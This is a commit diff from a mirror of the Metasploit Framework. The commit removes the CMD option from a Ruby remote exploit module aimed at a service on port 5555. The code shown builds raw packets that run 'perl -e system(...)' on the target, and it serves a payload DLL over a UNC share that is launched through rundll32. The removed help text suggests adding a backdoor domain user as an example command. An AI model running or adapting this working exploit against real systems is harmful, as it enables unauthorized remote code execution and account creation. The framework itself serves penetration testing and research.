1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Delete CMD option

This commit is contained in:
jvazquez-r7 2015-03-04 11:51:58 -06:00
parent d4337ce1ae
commit e04ff3ee24

View File

@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(5555),
OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll'])
], self.class)
@ -92,11 +91,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exec_bar(cmd)
connect
cmd = cmd.gsub("\\", "\\\\\\\\")
vprint_status("Sending Command: #{cmd}")
cmd.gsub!("\\", "\\\\\\\\")
cmd_no = target['Offset'] + cmd.length
vprint_status("Size is #{cmd_no}")
pkt = "\x00\x00\x00"
pkt << cmd_no
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
@ -104,40 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
pkt << "('#{cmd}')" # Executable
pkt << "\x00"
sock.put(pkt)
# In my testing the default timeout (10) isn't enough
if datastore['CMD']
begin
res = sock.get_once(-1, 20)
rescue EOFError # happens when using the Powershell method
disconnect
return
end
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
disconnect
else
handler
disconnect
end
end
def exec_bar?(data)
return false if data.blank?
data_unpacked = data.unpack("NnVv")
data_unpacked.length == 4 && data_unpacked[0] == 16 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x39 && data_unpacked[3] == 0x20
connect
sock.put(pkt)
disconnect
end
def primer
if datastore['CMD']
print_status("Executing command #{datastore['CMD']}")
exec_bar(datastore['CMD'])
else
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{unc}")
sploit = "rundll32.exe #{unc},"
sploit << rand_text_numeric(1)
exec_bar(sploit)
end
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
print_status("#{peer} - Trying to execute remote DLL...")
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
exec_bar(sploit)
end
end